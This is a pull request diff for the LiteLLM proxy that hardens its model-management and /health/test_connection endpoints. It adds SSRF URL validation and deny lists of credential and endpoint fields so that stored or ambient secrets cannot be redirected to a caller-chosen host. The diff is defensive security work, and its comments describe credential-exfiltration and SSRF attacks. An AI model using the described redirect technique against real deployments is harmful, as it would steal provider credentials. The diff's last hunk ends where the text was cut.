### PR TITLE
chore(proxy): tighten model-management authorization and stored-credential handling

### DIFF
--- a/litellm/proxy/common_utils/destination_credential_policy.py
+++ b/litellm/proxy/common_utils/destination_credential_policy.py
@@ -1,0 +1,66 @@
+"""Single source of truth for the destination-override credential policy.
+
+A non-admin must not redirect a model's endpoint and have the proxy's stored or
+ambient credentials sent there. The credential that actually authenticates a
+request depends on the destination's provider, so requiring "any credential" is
+insufficient: an api_key does not stop Bedrock/SageMaker from signing with
+ambient AWS credentials. Shared by the model-management write paths and
+/health/test_connection so the two policies cannot drift.
+"""
+
+from typing import Tuple
+
+# Caller-controllable endpoint URLs that retarget the outbound request. Mirrors
+# the endpoint-redirect subset of auth_utils._BANNED_REQUEST_BODY_PARAMS.
+URL_DESTINATION_FIELDS: Tuple[str, ...] = (
+    "api_base",
+    "base_url",
+    "aws_bedrock_runtime_endpoint",
+    "aws_sts_endpoint",
+    "sagemaker_base_url",
+    "s3_endpoint_url",
+    "deployment_url",
+)
+
+# Credential fields that must never be silently re-pointed at a new endpoint.
+CREDENTIAL_FIELDS: Tuple[str, ...] = (
+    "api_key",
+    "litellm_credential_name",
+    "aws_secret_access_key",
+    "aws_session_token",
+    "aws_web_identity_token",
+    "azure_ad_token",
+    "vertex_credentials",
+)
+
+_AWS_CREDENTIALS: Tuple[str, ...] = (
+    "aws_secret_access_key",
+    "aws_session_token",
+    "aws_web_identity_token",
+)
+# api_key-class credentials consumed by OpenAI-compatible / generic providers.
+_INLINE_CREDENTIALS: Tuple[str, ...] = (
+    "api_key",
+    "litellm_credential_name",
+    "azure_ad_token",
+    "vertex_credentials",
+)
+# AWS providers sign with ambient credentials (instance role / IRSA web identity)
+# when no explicit AWS credential is given, so only an AWS credential makes a
+# redirect of these fields self-contained.
+_CONSUMED_CREDENTIALS = {
+    "aws_bedrock_runtime_endpoint": _AWS_CREDENTIALS,
+    "aws_sts_endpoint": _AWS_CREDENTIALS,
+    "sagemaker_base_url": _AWS_CREDENTIALS,
+    "s3_endpoint_url": _AWS_CREDENTIALS,
+}
+
+
+def consumed_credentials_for(destination_field: str) -> Tuple[str, ...]:
+    """Credentials the destination's provider actually authenticates with.
+
+    Supplying a credential outside this set does not make redirecting the field
+    safe: the provider would fall back to the proxy's ambient/stored credentials
+    and send them to the new endpoint.
+    """
+    return _CONSUMED_CREDENTIALS.get(destination_field, _INLINE_CREDENTIALS)

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -14,6 +14,7 @@ import litellm
 from litellm._logging import verbose_logger, verbose_proxy_logger
 from litellm.constants import HEALTH_CHECK_TIMEOUT_SECONDS
 from litellm.litellm_core_utils.custom_logger_registry import CustomLoggerRegistry
+from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
 from litellm.llms.custom_httpx.http_handler import AsyncHTTPHandler
 from litellm.proxy._types import (
     AlertType,
@@ -119,6 +120,26 @@ def _reject_inherited_credential_redirect(
                 "error": "Cannot override the connection target (e.g. api_base) while inheriting stored credentials. Supply your own api_key, or omit the destination override."
             },
         )
+
+
+def _reject_ssrf_destination(litellm_params: dict) -> None:
+    """Block a (possibly request-overridden) api_base/base_url that resolves to an
+    internal/metadata target. Gated on litellm.user_url_validation (default True)
+    with user_url_allowed_hosts as the allowlist escape hatch, mirroring the
+    request-time guard so /health/test_connection cannot be used for SSRF."""
+    if not getattr(litellm, "user_url_validation", False):
+        return
+    for url_field in ("api_base", "base_url"):
+        url_value = litellm_params.get(url_field)
+        if not isinstance(url_value, str) or not url_value:
+            continue
+        try:
+            validate_url(url_value)
+        except SSRFError as e:
+            raise HTTPException(
+                status_code=400,
+                detail={"error": f"{url_field} is rejected by the SSRF guard: {e}"},
+            )
 
 
 def get_callback_identifier(callback):
@@ -1893,6 +1914,8 @@ async def test_model_connection(  # noqa: PLR0915
             config_litellm_params=config_litellm_params,
             request_litellm_params=request_litellm_params,
         )
+        # Block SSRF to internal/metadata targets via the (overridden) destination.
+        _reject_ssrf_destination(litellm_params)
 
         ## Auth check — when the deployment was resolved by id, authorize against
         ## its real owner (model_info), not the caller-supplied model_info, so a

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -83,40 +83,39 @@ _HEALTH_CREDENTIAL_FIELDS = (
     "litellm_credential_name",
     "aws_secret_access_key",
     "aws_session_token",
+    "azure_ad_token",
     "vertex_credentials",
 )
-_HEALTH_DESTINATION_FIELDS = (
-    "api_base",
-    "base_url",
-    "aws_bedrock_runtime_endpoint",
-    "aws_sts_endpoint",
-    "api_version",
-    "vertex_location",
-    "vertex_project",
-    "aws_region_name",
-)
 # Caller-controlled endpoint URLs: overriding one re-points the request (and any
-# credential) at a new host, so it is SSRF-validated.
+# credential) at a new host, so it is SSRF-validated. Mirrors the endpoint-redirect
+# subset of auth_utils._BANNED_REQUEST_BODY_PARAMS.
 _HEALTH_URL_FIELDS = (
     "api_base",
     "base_url",
     "aws_bedrock_runtime_endpoint",
     "aws_sts_endpoint",
+    "sagemaker_base_url",
+    "s3_endpoint_url",
+    "deployment_url",
 )
 
 
 def _assert_non_admin_destination_override_is_safe(
-    request_litellm_params: dict, user_api_key_dict: UserAPIKeyAuth
+    config_litellm_params: dict,
+    request_litellm_params: dict,
+    user_api_key_dict: UserAPIKeyAuth,
 ) -> None:
     """Confused-deputy / SSRF guard for /health/test_connection.
 
     When a non-admin overrides the connection target (api_base/base_url/provider
-    endpoint), the request must carry its own non-empty credential. Otherwise the
-    downstream provider falls back to a stored or environment secret (e.g. the
-    resolved deployment's key, or OPENAI_API_KEY) and sends it to the
-    caller-chosen address. The overridden URL is also SSRF-validated so it cannot
-    point at an internal host or cloud-metadata endpoint. Proxy admins are
-    unaffected.
+    endpoint), every credential the resolved deployment stores must be re-supplied
+    by the request (non-empty), and the request must carry a non-empty credential
+    at all. Otherwise the downstream provider sends a stored credential, or falls
+    back to an environment secret (e.g. OPENAI_API_KEY), to the caller-chosen
+    address — including the case where the caller supplies an unrelated credential
+    field to leave the stored one riding along. The overridden URL is also
+    SSRF-validated so it cannot point at an internal or cloud-metadata host.
+    Proxy admins are unaffected.
     """
     from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
     from litellm.proxy.common_utils.resource_ownership import is_proxy_admin
@@ -125,6 +124,14 @@ def _assert_non_admin_destination_override_is_safe(
         return
     if not any(request_litellm_params.get(field) for field in _HEALTH_URL_FIELDS):
         return
+    for field in _HEALTH_CREDENTIAL_FIELDS:
+        if config_litellm_params.get(field) and not request_litellm_params.get(field):
+            raise HTTPException(
+                status_code=400,
+                detail={
+                    "error": f"Re-provide {field} when overriding the connection target; a stored credential cannot be sent to a caller-chosen endpoint."
+                },
+            )
     if not any(
         request_litellm_params.get(field) for field in _HEALTH_CREDENTIAL_FIELDS
     ):
@@ -1926,6 +1933,7 @@ async def test_model_connection(  # noqa: PLR0915
         # A non-admin overriding the destination must bring their own credential
         # and a non-internal URL, so no stored/environment secret is sent out.
         _assert_non_admin_destination_override_is_safe(
+            config_litellm_params=config_litellm_params,
             request_litellm_params=request_litellm_params,
             user_api_key_dict=user_api_key_dict,
         )

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -1881,6 +1881,11 @@ async def test_model_connection(  # noqa: PLR0915
                         config_litellm_params = dict(
                             deployments[0].get("litellm_params", {})
                         )
+                        # Authorize against the matched deployment's owner, not
+                        # the caller-supplied model_info (same as the id path).
+                        resolved_model_info = dict(
+                            deployments[0].get("model_info", {}) or {}
+                        )
             except Exception as e:
                 verbose_proxy_logger.debug(
                     f"Could not find model {model_name} in router: {e}. "

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -27,6 +27,15 @@ from litellm.proxy._types import (
     WebhookEvent,
 )
 from litellm.proxy.auth.user_api_key_auth import user_api_key_auth
+from litellm.proxy.common_utils.destination_credential_policy import (
+    CREDENTIAL_FIELDS as _HEALTH_CREDENTIAL_FIELDS,
+)
+from litellm.proxy.common_utils.destination_credential_policy import (
+    URL_DESTINATION_FIELDS as _HEALTH_URL_FIELDS,
+)
+from litellm.proxy.common_utils.destination_credential_policy import (
+    consumed_credentials_for,
+)
 from litellm.proxy.db.exception_handler import PrismaDBExceptionHandler
 from litellm.proxy.health_check import (
     ADMIN_ONLY_HEALTH_DISPLAY_PARAMS,
@@ -78,29 +87,6 @@ def _reject_os_environ_references(params: dict) -> None:
                 stack.append(value)
 
 
-_HEALTH_CREDENTIAL_FIELDS = (
-    "api_key",
-    "litellm_credential_name",
-    "aws_secret_access_key",
-    "aws_session_token",
-    "aws_web_identity_token",
-    "azure_ad_token",
-    "vertex_credentials",
-)
-# Caller-controlled endpoint URLs: overriding one re-points the request (and any
-# credential) at a new host, so it is SSRF-validated. Mirrors the endpoint-redirect
-# subset of auth_utils._BANNED_REQUEST_BODY_PARAMS.
-_HEALTH_URL_FIELDS = (
-    "api_base",
-    "base_url",
-    "aws_bedrock_runtime_endpoint",
-    "aws_sts_endpoint",
-    "sagemaker_base_url",
-    "s3_endpoint_url",
-    "deployment_url",
-)
-
-
 def _assert_non_admin_destination_override_is_safe(
     config_litellm_params: dict,
     request_litellm_params: dict,
@@ -110,9 +96,10 @@ def _assert_non_admin_destination_override_is_safe(
 
     When a non-admin overrides the connection target (api_base/base_url/provider
     endpoint), every credential the resolved deployment stores must be re-supplied
-    by the request (non-empty), and the request must carry a non-empty credential
-    at all. Otherwise the downstream provider sends a stored credential, or falls
-    back to an environment secret (e.g. OPENAI_API_KEY), to the caller-chosen
+    by the request (non-empty), and each overridden URL must be accompanied by a
+    non-empty credential its provider actually consumes. Otherwise the downstream
+    provider sends a stored credential, or falls back to an ambient/environment
+    secret (e.g. OPENAI_API_KEY or ambient AWS credentials), to the caller-chosen
     address — including the case where the caller supplies an unrelated credential
     field to leave the stored one riding along. The overridden URL is also
     SSRF-validated so it cannot point at an internal or cloud-metadata host.
@@ -123,7 +110,10 @@ def _assert_non_admin_destination_override_is_safe(
 
     if is_proxy_admin(user_api_key_dict):
         return
-    if not any(request_litellm_params.get(field) for field in _HEALTH_URL_FIELDS):
+    overridden_urls = [
+        field for field in _HEALTH_URL_FIELDS if request_litellm_params.get(field)
+    ]
+    if not overridden_urls:
         return
     for field in _HEALTH_CREDENTIAL_FIELDS:
         if config_litellm_params.get(field) and not request_litellm_params.get(field):
@@ -133,15 +123,15 @@ def _assert_non_admin_destination_override_is_safe(
                     "error": f"Re-provide {field} when overriding the connection target; a stored credential cannot be sent to a caller-chosen endpoint."
                 },
             )
-    if not any(
-        request_litellm_params.get(field) for field in _HEALTH_CREDENTIAL_FIELDS
-    ):
-        raise HTTPException(
-            status_code=400,
-            detail={
-                "error": "Supply your own api_key when overriding the connection target (e.g. api_base); otherwise a stored or environment credential could be sent to it."
-            },
-        )
+    for field in overridden_urls:
+        consumed = consumed_credentials_for(field)
+        if not any(request_litellm_params.get(cred) for cred in consumed):
+            raise HTTPException(
+                status_code=400,
+                detail={
+                    "error": f"Overriding {field} requires supplying a credential it uses ({', '.join(consumed)}); otherwise a stored or ambient credential could be sent to it."
+                },
+            )
     if not getattr(litellm, "user_url_validation", False):
         return
     for field in _HEALTH_URL_FIELDS:

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -14,7 +14,6 @@ import litellm
 from litellm._logging import verbose_logger, verbose_proxy_logger
 from litellm.constants import HEALTH_CHECK_TIMEOUT_SECONDS
 from litellm.litellm_core_utils.custom_logger_registry import CustomLoggerRegistry
-from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
 from litellm.llms.custom_httpx.http_handler import AsyncHTTPHandler
 from litellm.proxy._types import (
     AlertType,
@@ -120,26 +119,6 @@ def _reject_inherited_credential_redirect(
                 "error": "Cannot override the connection target (e.g. api_base) while inheriting stored credentials. Supply your own api_key, or omit the destination override."
             },
         )
-
-
-def _reject_ssrf_destination(litellm_params: dict) -> None:
-    """Block a (possibly request-overridden) api_base/base_url that resolves to an
-    internal/metadata target. Gated on litellm.user_url_validation (default True)
-    with user_url_allowed_hosts as the allowlist escape hatch, mirroring the
-    request-time guard so /health/test_connection cannot be used for SSRF."""
-    if not getattr(litellm, "user_url_validation", False):
-        return
-    for url_field in ("api_base", "base_url"):
-        url_value = litellm_params.get(url_field)
-        if not isinstance(url_value, str) or not url_value:
-            continue
-        try:
-            validate_url(url_value)
-        except SSRFError as e:
-            raise HTTPException(
-                status_code=400,
-                detail={"error": f"{url_field} is rejected by the SSRF guard: {e}"},
-            )
 
 
 def get_callback_identifier(callback):
@@ -1914,8 +1893,6 @@ async def test_model_connection(  # noqa: PLR0915
             config_litellm_params=config_litellm_params,
             request_litellm_params=request_litellm_params,
         )
-        # Block SSRF to internal/metadata targets via the (overridden) destination.
-        _reject_ssrf_destination(litellm_params)
 
         ## Auth check — when the deployment was resolved by id, authorize against
         ## its real owner (model_info), not the caller-supplied model_info, so a

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -78,6 +78,49 @@ def _reject_os_environ_references(params: dict) -> None:
                 stack.append(value)
 
 
+_HEALTH_CREDENTIAL_FIELDS = (
+    "api_key",
+    "aws_secret_access_key",
+    "aws_session_token",
+    "vertex_credentials",
+)
+_HEALTH_DESTINATION_FIELDS = (
+    "api_base",
+    "base_url",
+    "api_version",
+    "vertex_location",
+    "vertex_project",
+    "aws_region_name",
+)
+
+
+def _reject_inherited_credential_redirect(
+    config_litellm_params: dict, request_litellm_params: dict
+) -> None:
+    """Confused-deputy guard for /health/test_connection.
+
+    If a credential is inherited from the resolved deployment (present in the
+    config params, not supplied by the request) while the request overrides the
+    connection target, the inherited secret would be sent to a caller-chosen
+    endpoint. Refuse it; the caller must supply their own credential or omit the
+    destination override.
+    """
+    inherited_credential = any(
+        field in config_litellm_params and field not in request_litellm_params
+        for field in _HEALTH_CREDENTIAL_FIELDS
+    )
+    overrides_destination = any(
+        field in request_litellm_params for field in _HEALTH_DESTINATION_FIELDS
+    )
+    if inherited_credential and overrides_destination:
+        raise HTTPException(
+            status_code=400,
+            detail={
+                "error": "Cannot override the connection target (e.g. api_base) while inheriting stored credentials. Supply your own api_key, or omit the destination override."
+            },
+        )
+
+
 def get_callback_identifier(callback):
     """
     Get the callback identifier string, handling both strings and objects.
@@ -1672,7 +1715,7 @@ async def health_liveliness_options():
     tags=["health"],
     dependencies=[Depends(user_api_key_auth)],
 )
-async def test_model_connection(
+async def test_model_connection(  # noqa: PLR0915
     request: Request,
     mode: Optional[
         Literal[
@@ -1747,6 +1790,7 @@ async def test_model_connection(
         dict: A dictionary containing the health check result with either success information or error details.
     """
     from litellm.proxy._types import CommonProxyErrors
+    from litellm.proxy.common_utils.resource_ownership import is_proxy_admin
     from litellm.proxy.management_endpoints.model_management_endpoints import (
         ModelManagementAuthChecks,
     )
@@ -1766,11 +1810,23 @@ async def test_model_connection(
         # already resolved before reaching this endpoint; any remaining
         # reference must have come from the request body.
         _reject_os_environ_references(request_litellm_params)
+        # Binding a named global credential resolves it by name with no ownership
+        # model, so it is proxy-admin-only (consistent with model management).
+        if request_litellm_params.get("litellm_credential_name") and not is_proxy_admin(
+            user_api_key_dict
+        ):
+            raise HTTPException(
+                status_code=403,
+                detail={"error": "Only proxy admins can use litellm_credential_name."},
+            )
         model_name = request_litellm_params.get("model")
 
         # Look up model configuration from router if model name is provided
         # This gets the litellm_params from proxy config (with resolved env vars)
         config_litellm_params: dict = {}
+        # model_info of the deployment resolved by id; used to authorize against
+        # the deployment's real owner rather than the caller-supplied model_info.
+        resolved_model_info: Optional[dict] = None
         if llm_router is not None:
             # Prefer disambiguation by deployment id (`model_info.id`) when
             # the caller supplies it. This is required when multiple
@@ -1791,6 +1847,9 @@ async def test_model_connection(
 
                 if deployment_by_id is not None:
                     config_litellm_params = deployment_by_id.litellm_params.model_dump(
+                        exclude_none=True
+                    )
+                    resolved_model_info = deployment_by_id.model_info.model_dump(
                         exclude_none=True
                     )
                 elif model_name:
@@ -1829,12 +1888,25 @@ async def test_model_connection(
         # This allows users to override specific params while using config for credentials
         litellm_params = {**config_litellm_params, **request_litellm_params}
 
-        ## Auth check
+        # Refuse sending an inherited credential to a caller-overridden destination.
+        _reject_inherited_credential_redirect(
+            config_litellm_params=config_litellm_params,
+            request_litellm_params=request_litellm_params,
+        )
+
+        ## Auth check — when the deployment was resolved by id, authorize against
+        ## its real owner (model_info), not the caller-supplied model_info, so a
+        ## team admin cannot probe another team's deployment by passing their own
+        ## team_id.
         await ModelManagementAuthChecks.can_user_make_model_call(
             model_params=Deployment(
                 model_name="test_model",
                 litellm_params=LiteLLM_Params(**litellm_params),
-                model_info=model_info,
+                model_info=(
+                    resolved_model_info
+                    if resolved_model_info is not None
+                    else model_info
+                ),
             ),
             user_api_key_dict=user_api_key_dict,
             prisma_client=prisma_client,

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -88,6 +88,8 @@ _HEALTH_CREDENTIAL_FIELDS = (
 _HEALTH_DESTINATION_FIELDS = (
     "api_base",
     "base_url",
+    "aws_bedrock_runtime_endpoint",
+    "aws_sts_endpoint",
     "api_version",
     "vertex_location",
     "vertex_project",

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -80,6 +80,7 @@ def _reject_os_environ_references(params: dict) -> None:
 
 _HEALTH_CREDENTIAL_FIELDS = (
     "api_key",
+    "litellm_credential_name",
     "aws_secret_access_key",
     "aws_session_token",
     "vertex_credentials",

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -95,33 +95,60 @@ _HEALTH_DESTINATION_FIELDS = (
     "vertex_project",
     "aws_region_name",
 )
+# Caller-controlled endpoint URLs: overriding one re-points the request (and any
+# credential) at a new host, so it is SSRF-validated.
+_HEALTH_URL_FIELDS = (
+    "api_base",
+    "base_url",
+    "aws_bedrock_runtime_endpoint",
+    "aws_sts_endpoint",
+)
 
 
-def _reject_inherited_credential_redirect(
-    config_litellm_params: dict, request_litellm_params: dict
+def _assert_non_admin_destination_override_is_safe(
+    request_litellm_params: dict, user_api_key_dict: UserAPIKeyAuth
 ) -> None:
-    """Confused-deputy guard for /health/test_connection.
+    """Confused-deputy / SSRF guard for /health/test_connection.
 
-    If a credential is inherited from the resolved deployment (present in the
-    config params, not supplied by the request) while the request overrides the
-    connection target, the inherited secret would be sent to a caller-chosen
-    endpoint. Refuse it; the caller must supply their own credential or omit the
-    destination override.
+    When a non-admin overrides the connection target (api_base/base_url/provider
+    endpoint), the request must carry its own non-empty credential. Otherwise the
+    downstream provider falls back to a stored or environment secret (e.g. the
+    resolved deployment's key, or OPENAI_API_KEY) and sends it to the
+    caller-chosen address. The overridden URL is also SSRF-validated so it cannot
+    point at an internal host or cloud-metadata endpoint. Proxy admins are
+    unaffected.
     """
-    inherited_credential = any(
-        config_litellm_params.get(field) and not request_litellm_params.get(field)
-        for field in _HEALTH_CREDENTIAL_FIELDS
-    )
-    overrides_destination = any(
-        request_litellm_params.get(field) for field in _HEALTH_DESTINATION_FIELDS
-    )
-    if inherited_credential and overrides_destination:
+    from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
+    from litellm.proxy.common_utils.resource_ownership import is_proxy_admin
+
+    if is_proxy_admin(user_api_key_dict):
+        return
+    if not any(request_litellm_params.get(field) for field in _HEALTH_URL_FIELDS):
+        return
+    if not any(
+        request_litellm_params.get(field) for field in _HEALTH_CREDENTIAL_FIELDS
+    ):
         raise HTTPException(
             status_code=400,
             detail={
-                "error": "Cannot override the connection target (e.g. api_base) while inheriting stored credentials. Supply your own api_key, or omit the destination override."
+                "error": "Supply your own api_key when overriding the connection target (e.g. api_base); otherwise a stored or environment credential could be sent to it."
             },
         )
+    if not getattr(litellm, "user_url_validation", False):
+        return
+    for field in _HEALTH_URL_FIELDS:
+        url = request_litellm_params.get(field)
+        if not url or not isinstance(url, str):
+            continue
+        try:
+            validate_url(url)
+        except SSRFError as e:
+            raise HTTPException(
+                status_code=400,
+                detail={
+                    "error": f"{field} is rejected by the SSRF guard ({e}). Add the host to general_settings.user_url_allowed_hosts to allow it."
+                },
+            )
 
 
 def get_callback_identifier(callback):
@@ -1896,10 +1923,11 @@ async def test_model_connection(  # noqa: PLR0915
         # This allows users to override specific params while using config for credentials
         litellm_params = {**config_litellm_params, **request_litellm_params}
 
-        # Refuse sending an inherited credential to a caller-overridden destination.
-        _reject_inherited_credential_redirect(
-            config_litellm_params=config_litellm_params,
+        # A non-admin overriding the destination must bring their own credential
+        # and a non-internal URL, so no stored/environment secret is sent out.
+        _assert_non_admin_destination_override_is_safe(
             request_litellm_params=request_litellm_params,
+            user_api_key_dict=user_api_key_dict,
         )
 
         ## Auth check — when the deployment was resolved by id, authorize against

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -109,11 +109,11 @@ def _reject_inherited_credential_redirect(
     destination override.
     """
     inherited_credential = any(
-        field in config_litellm_params and field not in request_litellm_params
+        config_litellm_params.get(field) and not request_litellm_params.get(field)
         for field in _HEALTH_CREDENTIAL_FIELDS
     )
     overrides_destination = any(
-        field in request_litellm_params for field in _HEALTH_DESTINATION_FIELDS
+        request_litellm_params.get(field) for field in _HEALTH_DESTINATION_FIELDS
     )
     if inherited_credential and overrides_destination:
         raise HTTPException(

--- a/litellm/proxy/health_endpoints/_health_endpoints.py
+++ b/litellm/proxy/health_endpoints/_health_endpoints.py
@@ -83,6 +83,7 @@ _HEALTH_CREDENTIAL_FIELDS = (
     "litellm_credential_name",
     "aws_secret_access_key",
     "aws_session_token",
+    "aws_web_identity_token",
     "azure_ad_token",
     "vertex_credentials",
 )

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -77,7 +77,16 @@ _CREDENTIAL_LITELLM_PARAMS = (
     "aws_session_token",
     "vertex_credentials",
 )
-_DESTINATION_LITELLM_PARAMS = ("api_base", "base_url", "custom_llm_provider")
+# Caller-controlled endpoint URLs that must be SSRF-validated on write.
+_URL_LITELLM_PARAMS = (
+    "api_base",
+    "base_url",
+    "aws_bedrock_runtime_endpoint",
+    "aws_sts_endpoint",
+)
+# Destination fields whose change must drop an inherited credential (URLs above
+# plus the provider selector, which isn't a URL so isn't SSRF-validated).
+_DESTINATION_LITELLM_PARAMS = _URL_LITELLM_PARAMS + ("custom_llm_provider",)
 
 
 def _field_explicitly_set(model: Optional[BaseModel], field: str) -> bool:
@@ -92,7 +101,7 @@ def _validate_model_url_params(litellm_params: dict) -> None:
     with user_url_allowed_hosts as the escape hatch for internal endpoints."""
     if not getattr(litellm, "user_url_validation", False):
         return
-    for url_field in ("api_base", "base_url"):
+    for url_field in _URL_LITELLM_PARAMS:
         url_value = litellm_params.get(url_field)
         if not url_value or not isinstance(url_value, str):
             continue
@@ -151,13 +160,18 @@ def _is_pricing_field(field: str) -> bool:
 
 def _contains_env_reference(value: object) -> bool:
     """True if any (possibly nested) string is an `os.environ/` reference, which
-    resolves to a server-side environment secret at call time."""
-    if isinstance(value, str):
-        return value.startswith("os.environ/")
-    if isinstance(value, dict):
-        return any(_contains_env_reference(v) for v in value.values())
-    if isinstance(value, list):
-        return any(_contains_env_reference(v) for v in value)
+    resolves to a server-side environment secret at call time. Iterative (stack)
+    rather than recursive, matching _reject_os_environ_references."""
+    stack: List[object] = [value]
+    while stack:
+        item = stack.pop()
+        if isinstance(item, str):
+            if item.startswith("os.environ/"):
+                return True
+        elif isinstance(item, dict):
+            stack.extend(item.values())
+        elif isinstance(item, list):
+            stack.extend(item)
     return False
 
 

--- a/litellm/proxy/management_endpoints/model_management_endpoints.py
+++ b/litellm/proxy/management_endpoints/model_management_endpoints.py
@@ -13,11 +13,12 @@ model/{model_id}/update - PATCH endpoint for model update.
 import asyncio
 import datetime
 import json
-from typing import Dict, List, Literal, Optional, Tuple, Union, cast
+from typing import Callable, Dict, List, Literal, Optional, Tuple, Union, cast
 
 from fastapi import APIRouter, Depends, HTTPException, Request, status
 from pydantic import BaseModel, ConfigDict, Field
 
+import litellm
 from litellm._logging import verbose_proxy_logger
 from litellm._uuid import uuid
 from litellm.constants import LITELLM_PROXY_ADMIN_NAME
@@ -35,8 +36,13 @@ from litellm.proxy._types import (
     TeamModelDeleteRequest,
     UserAPIKeyAuth,
 )
+from litellm.litellm_core_utils.url_utils import SSRFError, validate_url
 from litellm.proxy.auth.user_api_key_auth import user_api_key_auth
-from litellm.proxy.common_utils.encrypt_decrypt_utils import encrypt_value_helper
+from litellm.proxy.common_utils.encrypt_decrypt_utils import (
+    decrypt_value_helper,
+    encrypt_value_helper,
+)
+from litellm.proxy.common_utils.resource_ownership import is_proxy_admin
 from litellm.proxy.management_endpoints.common_utils import _is_user_team_admin
 from litellm.proxy.management_endpoints.team_endpoints import (
     team_model_add,
@@ -60,6 +66,142 @@ from litellm.types.router import (
 from litellm.utils import get_utc_datetime
 
 router = APIRouter()
+
+
+# Credential fields that must never be silently re-pointed at a new endpoint,
+# and the routing fields that change where they are sent.
+_CREDENTIAL_LITELLM_PARAMS = (
+    "api_key",
+    "litellm_credential_name",
+    "aws_secret_access_key",
+    "aws_session_token",
+    "vertex_credentials",
+)
+_DESTINATION_LITELLM_PARAMS = ("api_base", "base_url", "custom_llm_provider")
+
+
+def _field_explicitly_set(model: Optional[BaseModel], field: str) -> bool:
+    """True if `field` was explicitly provided (to a value or null) on a model."""
+    return model is not None and field in model.model_fields_set
+
+
+def _validate_model_url_params(litellm_params: dict) -> None:
+    """SSRF-guard api_base/base_url on stored model configs, mirroring the
+    request-time guard in auth_utils.is_request_body_safe so the proxy applies
+    one consistent policy. Gated on litellm.user_url_validation (default True)
+    with user_url_allowed_hosts as the escape hatch for internal endpoints."""
+    if not getattr(litellm, "user_url_validation", False):
+        return
+    for url_field in ("api_base", "base_url"):
+        url_value = litellm_params.get(url_field)
+        if not url_value or not isinstance(url_value, str):
+            continue
+        try:
+            validate_url(url_value)
+        except SSRFError as e:
+            raise ProxyException(
+                message=(
+                    f"{url_field}={url_value!r} is rejected by the SSRF guard "
+                    f"({e}). Add the host to general_settings.user_url_allowed_hosts "
+                    "to allow it."
+                ),
+                type=ProxyErrorTypes.validation_error.value,
+                code=status.HTTP_400_BAD_REQUEST,
+                param=url_field,
+            )
+
+
+def _decrypted_param(value: object) -> object:
+    """Decrypt a stored litellm_param for comparison; non-string or
+    non-encrypted values pass through unchanged."""
+    return (
+        decrypt_value_helper(value, "litellm_param", return_original_value=True)
+        if isinstance(value, str)
+        else value
+    )
+
+
+def _strip_credentials_on_destination_change(
+    merged_litellm_params: dict,
+    patch_plaintext: dict,
+    db_plaintext: "Callable[[str], object]",
+) -> None:
+    """If the patch changes a destination field (api_base/base_url/custom_llm_provider)
+    without supplying a fresh credential, drop the inherited secret(s) from the
+    merged params so a stored credential is never silently re-pointed at a new
+    (possibly attacker-controlled) endpoint."""
+    destination_changed = any(
+        field in patch_plaintext and patch_plaintext[field] != db_plaintext(field)
+        for field in _DESTINATION_LITELLM_PARAMS
+    )
+    supplied_new_credential = any(
+        field in patch_plaintext for field in _CREDENTIAL_LITELLM_PARAMS
+    )
+    if destination_changed and not supplied_new_credential:
+        for field in _CREDENTIAL_LITELLM_PARAMS:
+            merged_litellm_params.pop(field, None)
+
+
+def _assert_privileged_model_fields_authorized(
+    litellm_params: Optional[BaseModel],
+    model_info: Optional[BaseModel],
+    user_api_key_dict: UserAPIKeyAuth,
+) -> None:
+    """Pricing overrides and credential-name binding are proxy-admin-only.
+
+    Per-token/character pricing (SPECIAL_MODEL_INFO_PARAMS) gates spend/budget
+    enforcement, so a non-admin must not set or clear it. litellm_credential_name
+    resolves a globally-stored credential by name with no ownership model, so
+    only a proxy admin may bind one to a model.
+    """
+    if is_proxy_admin(user_api_key_dict):
+        return
+    for field in SPECIAL_MODEL_INFO_PARAMS:
+        if _field_explicitly_set(litellm_params, field) or _field_explicitly_set(
+            model_info, field
+        ):
+            raise ProxyException(
+                message=f"Only proxy admins can set model pricing fields (e.g. {field}).",
+                type=ProxyErrorTypes.auth_error.value,
+                code=status.HTTP_403_FORBIDDEN,
+                param=field,
+            )
+    if (
+        _field_explicitly_set(litellm_params, "litellm_credential_name")
+        and litellm_params.litellm_credential_name is not None  # type: ignore
+    ):
+        raise ProxyException(
+            message="Only proxy admins can bind a stored credential (litellm_credential_name) to a model.",
+            type=ProxyErrorTypes.auth_error.value,
+            code=status.HTTP_403_FORBIDDEN,
+            param="litellm_credential_name",
+        )
+
+
+def _assert_team_model_has_own_credential(
+    model_params: Deployment, user_api_key_dict: UserAPIKeyAuth
+) -> None:
+    """A team-scoped model created by a non-admin must carry its own credential,
+    so it cannot silently inherit the proxy's global provider keys at call time."""
+    if is_proxy_admin(user_api_key_dict):
+        return
+    if model_params.model_info is None or model_params.model_info.team_id is None:
+        return
+    litellm_params = model_params.litellm_params
+    has_credential = any(
+        getattr(litellm_params, field, None)
+        for field in ("api_key", "aws_secret_access_key", "vertex_credentials")
+    )
+    if not has_credential:
+        raise ProxyException(
+            message=(
+                "Team-scoped models must provide their own credential (e.g. "
+                "litellm_params.api_key) and cannot inherit the proxy's global keys."
+            ),
+            type=ProxyErrorTypes.validation_error.value,
